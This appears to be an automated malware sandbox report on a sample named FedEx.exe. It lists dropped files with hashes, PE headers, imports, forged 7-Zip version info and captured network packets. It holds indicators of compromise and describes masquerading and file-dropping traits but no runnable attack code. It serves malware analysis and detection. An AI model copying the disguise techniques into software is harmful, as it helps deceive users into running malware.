                                            Process:C:\Users\Public\Libraries\Rvsuben.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):341504
                                            Entropy (8bit):7.5223336113816535
                                            Encrypted:false
                                            SSDEEP:6144:n5Vpqq3bsZFPu2HJ8EHJ9qODGsbfs41SOTe7iOh4XIWHXi1YOCEJQ8eYJXF4Hd:nxAtHLjksQ41SOC44n1Y5Ey7YJXqd
                                            MD5:7002BA887828B70866CE7884BFB1DF11
                                            SHA1:814FA55CF88A9B569A4DA801963A724BAD873D20
                                            SHA-256:1C234FA689ED829CBE7EDE347F677230CBBB29B759C096732D969EB79A1CEB5A
                                            SHA-512:82E55E9CF8AEB281DC590DEE5567F8E5822E339D7B63B262ED64CDB34EBBA3D347616E6FB8D91B80ED766F2C23AEB45BB12ACAD893D4249852B627C924D9EA25
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:. V.=.......99..~............................................;...Y...zC.[~;..[.....68..8...44.:.(..8.4.4.....*..GG..........U.J.YJ.YJ.Y.sxY..Y..pY..Y...Y*.Y..ZY..Y...YH.Y...YF.Y..7Y..Y...Y..YJ.:Yt.Y3..YL.Y3.ZY..Y..tY..Y3..Y..Y....J.Y.....;A.S$............7E;.S......=..............................................F?...........;..................................6..*......Fv...................F..Vc..........................................................................................i.............................&..............................................#C...&.................................*....6.................................Vc...F.......................................v.......H...................8.8....Fv......x...J......................................b..................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\Rvsubentohcvaxlbphydsofhyldatal[1]

                                            Download File
                                            Process:C:\Users\Public\Libraries\Rvsuben.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):341504
                                            Entropy (8bit):7.5223336113816535
                                            Encrypted:false
                                            SSDEEP:6144:n5Vpqq3bsZFPu2HJ8EHJ9qODGsbfs41SOTe7iOh4XIWHXi1YOCEJQ8eYJXF4Hd:nxAtHLjksQ41SOC44n1Y5Ey7YJXqd
                                            MD5:7002BA887828B70866CE7884BFB1DF11
                                            SHA1:814FA55CF88A9B569A4DA801963A724BAD873D20
                                            SHA-256:1C234FA689ED829CBE7EDE347F677230CBBB29B759C096732D969EB79A1CEB5A
                                            SHA-512:82E55E9CF8AEB281DC590DEE5567F8E5822E339D7B63B262ED64CDB34EBBA3D347616E6FB8D91B80ED766F2C23AEB45BB12ACAD893D4249852B627C924D9EA25
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:. V.=.......99..~............................................;...Y...zC.[~;..[.....68..8...44.:.(..8.4.4.....*..GG..........U.J.YJ.YJ.Y.sxY..Y..pY..Y...Y*.Y..ZY..Y...YH.Y...YF.Y..7Y..Y...Y..YJ.:Yt.Y3..YL.Y3.ZY..Y..tY..Y3..Y..Y....J.Y.....;A.S$............7E;.S......=..............................................F?...........;..................................6..*......Fv...................F..Vc..........................................................................................i.............................&..............................................#C...&.................................*....6.................................Vc...F.......................................v.......H...................8.8....Fv......x...J......................................b..................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Rvsubentohcvaxlbphydsofhyldatal[2]

                                            Download File
                                            Process:C:\Users\user\Desktop\FedEx.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):341504
                                            Entropy (8bit):7.5223336113816535
                                            Encrypted:false
                                            SSDEEP:6144:n5Vpqq3bsZFPu2HJ8EHJ9qODGsbfs41SOTe7iOh4XIWHXi1YOCEJQ8eYJXF4Hd:nxAtHLjksQ41SOC44n1Y5Ey7YJXqd
                                            MD5:7002BA887828B70866CE7884BFB1DF11
                                            SHA1:814FA55CF88A9B569A4DA801963A724BAD873D20
                                            SHA-256:1C234FA689ED829CBE7EDE347F677230CBBB29B759C096732D969EB79A1CEB5A
                                            SHA-512:82E55E9CF8AEB281DC590DEE5567F8E5822E339D7B63B262ED64CDB34EBBA3D347616E6FB8D91B80ED766F2C23AEB45BB12ACAD893D4249852B627C924D9EA25
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:. V.=.......99..~............................................;...Y...zC.[~;..[.....68..8...44.:.(..8.4.4.....*..GG..........U.J.YJ.YJ.Y.sxY..Y..pY..Y...Y*.Y..ZY..Y...YH.Y...YF.Y..7Y..Y...Y..YJ.:Yt.Y3..YL.Y3.ZY..Y..tY..Y3..Y..Y....J.Y.....;A.S$............7E;.S......=..............................................F?...........;..................................6..*......Fv...................F..Vc..........................................................................................i.............................&..............................................#C...&.................................*....6.................................Vc...F.......................................v.......H...................8.8....Fv......x...J......................................b..................................................................................................................................................................................................

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.039027640370719
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.81%
                                            • Windows Screen Saver (13104/52) 0.13%
                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            File name:FedEx.exe
                                            File size:806912
                                            MD5:917aa80e03e09b1d2b6619cc62cdbe22
                                            SHA1:4124f6fa2d81e4f3db5bc62099fe4f03f71f091f
                                            SHA256:57f4cf106379977932d3ca39bfceb27bf66b55b60465f3a6560d71983709ecea
                                            SHA512:74c686b106b5223a16397a4cd97911485b9b7bdbb53adb9dcfeea784ab92060679e046f756514c609df1c789aea3051c8d9bbb4767d0beff9e60d7d55e2f5c55
                                            SSDEEP:12288:PDVMCvQQIQzSswvpYTT4GhvcQLGSzX9GyT8ipYdaQHOJ0qKcFxilF0uFC1Vv8E:PZpnUpyT4G9cQxxgirOgFNY0y
                                            TLSH:E905AE22F2D0843BC473D5B91C5B92B45C39BE143E689C4A6FE52CB88F38AE17935197
                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                            File Icon

                                            Icon Hash:1080888c8c828010

                                            Static PE Info

                                            General

                                            Entrypoint:0x47f184
                                            Entrypoint Section:.itext
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                            DLL Characteristics:
                                            Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:018a80c00aff107bf9538dc2e44950b6

                                            Entrypoint Preview

                                            Instruction
                                            push ebp
                                            mov ebp, esp
                                            add esp, FFFFFFF0h
                                            mov eax, 0047D0B0h
                                            call 00007FA2886FF8C1h
                                            mov eax, dword ptr [00481DD4h]
                                            mov eax, dword ptr [eax]
                                            call 00007FA28875A2D5h
                                            mov ecx, dword ptr [00481EF0h]
                                            mov eax, dword ptr [00481DD4h]
                                            mov eax, dword ptr [eax]
                                            mov edx, dword ptr [0047CCA4h]
                                            call 00007FA28875A2D5h
                                            mov eax, dword ptr [00481DD4h]
                                            mov eax, dword ptr [eax]
                                            call 00007FA28875A349h
                                            call 00007FA2886FD544h
                                            lea eax, dword ptr [eax+00h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xd80000x29f8.idata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xe60000x39e84.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xdd0000x8848.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0xdc0000x18.rdata
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0xd87e80x680.idata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x7c3100x7c400False0.526263047032data6.55524909137IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .itext0x7e0000x11cc0x1200False0.561197916667data6.07380396482IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .data0x800000x1f940x2000False0.407836914062data4.02781873819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                            .bss0x820000x55f140x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                            .idata0xd80000x29f80x2a00False0.322079613095zlib compressed data5.22135102792IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                            .tls0xdb0000x400x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                            .rdata0xdc0000x180x200False0.05078125data0.210826267787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0xdd0000x88480x8a00False0.584918478261data6.6420816929IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            .rsrc0xe60000x39e840x3a000False0.540796740302data7.26548685229IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            RT_CURSOR0xe6c600x134dataEnglishUnited States
                                            RT_CURSOR0xe6d940x134dataEnglishUnited States
                                            RT_CURSOR0xe6ec80x134dataEnglishUnited States
                                            RT_CURSOR0xe6ffc0x134dataEnglishUnited States
                                            RT_CURSOR0xe71300x134dataEnglishUnited States
                                            RT_CURSOR0xe72640x134dataEnglishUnited States
                                            RT_CURSOR0xe73980x134dataEnglishUnited States
                                            RT_BITMAP0xe74cc0x1d0dataEnglishUnited States
                                            RT_BITMAP0xe769c0x1e4dataEnglishUnited States
                                            RT_BITMAP0xe78800x1d0dataEnglishUnited States
                                            RT_BITMAP0xe7a500x1d0dataEnglishUnited States
                                            RT_BITMAP0xe7c200x1d0dataEnglishUnited States
                                            RT_BITMAP0xe7df00x1d0dataEnglishUnited States
                                            RT_BITMAP0xe7fc00x1d0dataEnglishUnited States
                                            RT_BITMAP0xe81900x1d0dataEnglishUnited States
                                            RT_BITMAP0xe83600x1d0dataEnglishUnited States
                                            RT_BITMAP0xe85300x1d0dataEnglishUnited States
                                            RT_BITMAP0xe87000xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                                            RT_ICON0xe87e80x25a8data
                                            RT_ICON0xead900x10a8data
                                            RT_ICON0xebe380x988data
                                            RT_ICON0xec7c00x468GLS_BINARY_LSB_FIRST
                                            RT_DIALOG0xecc280x52data
                                            RT_DIALOG0xecc7c0x52data
                                            RT_STRING0xeccd00x39cdata
                                            RT_STRING0xed06c0x4f8data
                                            RT_STRING0xed5640xfcdata
                                            RT_STRING0xed6600xccdata
                                            RT_STRING0xed72c0x110data
                                            RT_STRING0xed83c0x40cdata
                                            RT_STRING0xedc480x378data
                                            RT_STRING0xedfc00x388data
                                            RT_STRING0xee3480x3f0data
                                            RT_STRING0xee7380x190data
                                            RT_STRING0xee8c80xccdata
                                            RT_STRING0xee9940x1c4data
                                            RT_STRING0xeeb580x3c8data
                                            RT_STRING0xeef200x338data
                                            RT_STRING0xef2580x294data
                                            RT_RCDATA0xef4ec0x10data
                                            RT_RCDATA0xef4fc0x32dPNG image data, 16 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                            RT_RCDATA0xef82c0x2d8data
                                            RT_RCDATA0xefb040x4b05dataEnglishUnited States
                                            RT_RCDATA0xf460c0x159Delphi compiled form 'TForm1'
                                            RT_RCDATA0xf47680x2b0c4RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 8000 HzEnglishUnited States
                                            RT_GROUP_CURSOR0x11f82c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                            RT_GROUP_CURSOR0x11f8400x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                            RT_GROUP_CURSOR0x11f8540x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                            RT_GROUP_CURSOR0x11f8680x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                            RT_GROUP_CURSOR0x11f87c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                            RT_GROUP_CURSOR0x11f8900x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                            RT_GROUP_CURSOR0x11f8a40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                            RT_GROUP_ICON0x11f8b80x3edata
                                            RT_VERSION0x11f8f80x58cdataEnglishUnited States

                                            Imports

                                            DLLImport
                                            oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                            user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                            kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                            kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                            user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, NotifyWinEvent, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawStateA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                            gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                            version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                            kernel32.dlllstrcpyA, WriteFile, WideCharToMultiByte, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FlushInstructionCache, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteFileA, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                            oleaut32.dllGetErrorInfo, VariantInit, SysFreeString
                                            ole32.dllCoUninitialize, CoInitialize
                                            kernel32.dllSleep
                                            oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                            comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                            winmm.dllsndPlaySoundA
                                            oleacc.dllLresultFromObject

                                            Version Infos

                                            DescriptionData
                                            LegalCopyrightCopyright (c) 1999-2021 Igor Pavlov
                                            InternalName7z
                                            FileVersion21.02 alpha
                                            CompanyNameIgor Pavlov
                                            ProductName7-Zip
                                            ProductVersion21.02 alpha
                                            FileDescription7-Zip Console
                                            OriginalFilename7z.exe
                                            Translation0x0409 0x04b0

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States

                                            Network Behavior

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            May 13, 2022 17:18:27.602435112 CEST49753443192.168.2.513.107.43.13
                                            May 13, 2022 17:18:27.602515936 CEST4434975313.107.43.13192.168.2.5
                                            May 13, 2022 17:18:27.602617979 CEST49753443192.168.2.513.107.43.13
                                            May 13, 2022 17:18:27.640605927 CEST49753443192.168.2.513.107.43.13
                                            May 13, 2022 17:18:27.640718937 CEST4434975313.107.43.13192.168.2.5
                                            May 13, 2022 17:18:27.748585939 CEST4434975313.107.43.13192.168.2.5
                                            May 13, 2022 17:18:27.748764992 CEST49753443192.168.2.513.107.43.13
                                            May 13, 2022 17:18:28.131989002 CEST49753443192.168.2.513.107.43.13
                                            May 13, 2022 17:18:28.132025957 CEST4434975313.107.43.13192.168.2.5
                                            May 13, 2022 17:18:28.132378101 CEST4434975313.107.43.13192.168.2.5
                                            May 13, 2022 17:18:28.132477999 CEST49753443192.168.2.513.107.43.13
                                            May 13, 2022 17:18:28.135694027 CEST49753443192.168.2.513.107.43.13
                                            May 13, 2022 17:18:28.176507950 CEST4434975313.107.43.13192.168.2.5
                                            May 13, 2022 17:18:28.873914003 CEST4434975313.107.43.13192.168.2.5
                                            May 13, 2022 17:18:28.874032021 CEST4434975313.107.43.13192.168.2.5
                                            May 13, 2022 17:18:28.874088049 CEST49753443192.168.2.513.107.43.13
                                            May 13, 2022 17:18:28.874125957 CEST49753443192.168.2.513.107.43.13
                                            May 13, 2022 17:18:28.922616959 CEST49753443192.168.2.513.107.43.13
                                            May 13, 2022 17:18:28.922672033 CEST4434975313.107.43.13192.168.2.5
                                            May 13, 2022 17:18:29.027573109 CEST49754443192.168.2.513.107.43.12
                                            May 13, 2022 17:18:29.027630091 CEST4434975413.107.43.12192.168.2.5
                                            May 13, 2022 17:18:29.027729034 CEST49754443192.168.2.513.107.43.12
                                            May 13, 2022 17:18:29.028371096 CEST49754443192.168.2.513.107.43.12
                                            May 13, 2022 17:18:29.028389931 CEST4434975413.107.43.12192.168.2.5
                                            May 13, 2022 17:18:29.129440069 CEST4434975413.107.43.12192.168.2.5
                                            May 13, 2022 17:18:29.129543066 CEST49754443192.168.2.513.107.43.12
                                            May 13, 2022 17:18:29.130373001 CEST4434975413.107.43.12192.168.2.5
                                            May 13, 2022 17:18:29.130445957 CEST49754443192.168.2.513.107.43.12
                                            May 13, 2022 17:18:29.138591051 CEST49754443192.168.2.513.107.43.12
                                            May 13, 2022 17:18:29.138607979 CEST4434975413.107.43.12192.168.2.5
                                            May 13, 2022 17:18:29.138894081 CEST4434975413.107.43.12192.168.2.5
                                            May 13, 2022 17:18:29.138966084 CEST49754443192.168.2.513.107.43.12
                                            May 13, 2022 17:18:29.140614986 CEST49754443192.168.2.513.107.43.12
                                            May 13, 2022 17:18:29.188520908 CEST4434975413.107.43.12192.168.2.5
                                            May 13, 2022 17:18:29.803944111 CEST4434975413.107.43.12192.168.2.5
                                            May 13, 2022 17:18:29.804003000 CEST4434975413.107.43.12192.168.2.5
                                            May 13, 2022 17:18:29.804080963 CEST49754443192.168.2.513.107.43.12
                                            May 13, 2022 17:18:29.804120064 CEST4434975413.107.43.12192.168.2.5
                                            May 13, 2022 17:18:29.804145098 CEST49754443192.168.2.513.107.43.12
                                            May 13, 2022 17:18:29.804155111 CEST4434975413.107.43.12192.168.2.5
                                            May 13, 2022 17:18:29.804195881 CEST49754443192.168.2.513.107.43.12
                                            May 13, 2022 17:18:29.804208040 CEST4434975413.107.43.12192.168.2.5
                                            May 13, 2022 17:18:29.804223061 CEST49754443192.168.2.513.107.43.12
                                            May 13, 2022 17:18:29.804265022 CEST4434975413.107.43.12192.168.2.5
                                            May 13, 2022 17:18:29.804266930 CEST49754443192.168.2.513.107.43.12
                                            May 13, 2022 17:18:29.804286957 CEST4434975413.107.43.12192.168.2.5
                                            May 13, 2022 17:18:29.804330111 CEST49754443192.168.2.513.107.43.12
                                            May 13, 2022 17:18:29.804367065 CEST49754443192.168.2.513.107.43.12
                                            May 13, 2022 17:18:29.804380894 CEST4434975413.107.43.12192.168.2.5
                                            May 13, 2022 17:18:29.804445982 CEST49754443192.168.2.513.107.43.12
                                            May 13, 2022 17:18:29.810998917 CEST49754443192.168.2.513.107.43.12
                                            May 13, 2022 17:18:29.811506987 CEST4434975413.107.43.12192.168.2.5
                                            May 13, 2022 17:18:29.811583042 CEST4434975413.107.43.12192.168.2.5
                                            May 13, 2022 17:18:29.811619997 CEST49754443192.168.2.513.107.43.12
                                            May 13, 2022 17:18:29.811697960 CEST49754443192.168.2.513.107.43.12
                                            May 13, 2022 17:18:29.870044947 CEST49760443192.168.2.513.107.43.13
                                            May 13, 2022 17:18:29.870091915 CEST4434976013.107.43.13192.168.2.5
                                            May 13, 2022 17:18:29.870192051 CEST49760443192.168.2.513.107.43.13
                                            May 13, 2022 17:18:29.902060986 CEST49760443192.168.2.513.107.43.13
                                            May 13, 2022 17:18:29.902116060 CEST4434976013.107.43.13192.168.2.5
                                            May 13, 2022 17:18:29.992933035 CEST4434976013.107.43.13192.168.2.5
                                            May 13, 2022 17:18:29.993052006 CEST49760443192.168.2.513.107.43.13
                                            May 13, 2022 17:18:29.994998932 CEST49760443192.168.2.513.107.43.13
                                            May 13, 2022 17:18:29.995021105 CEST4434976013.107.43.13192.168.2.5
                                            May 13, 2022 17:18:29.999756098 CEST49760443192.168.2.513.107.43.13
                                            May 13, 2022 17:18:29.999777079 CEST4434976013.107.43.13192.168.2.5
                                            May 13, 2022 17:18:30.732346058 CEST4434976013.107.43.13192.168.2.5
                                            May 13, 2022 17:18:30.732446909 CEST49760443192.168.2.513.107.43.13
                                            May 13, 2022 17:18:30.732459068 CEST4434976013.107.43.13192.168.2.5
                                            May 13, 2022 17:18:30.732552052 CEST49760443192.168.2.513.107.43.13
                                            May 13, 2022 17:18:30.733375072 CEST49760443192.168.2.513.107.43.13
                                            May 13, 2022 17:18:30.733407021 CEST4434976013.107.43.13192.168.2.5
                                            May 13, 2022 17:18:30.810574055 CEST49768443192.168.2.513.107.43.12
                                            May 13, 2022 17:18:30.810615063 CEST4434976813.107.43.12192.168.2.5
                                            May 13, 2022 17:18:30.810699940 CEST49768443192.168.2.513.107.43.12
                                            May 13, 2022 17:18:30.811158895 CEST49768443192.168.2.513.107.43.12
                                            May 13, 2022 17:18:30.811175108 CEST4434976813.107.43.12192.168.2.5
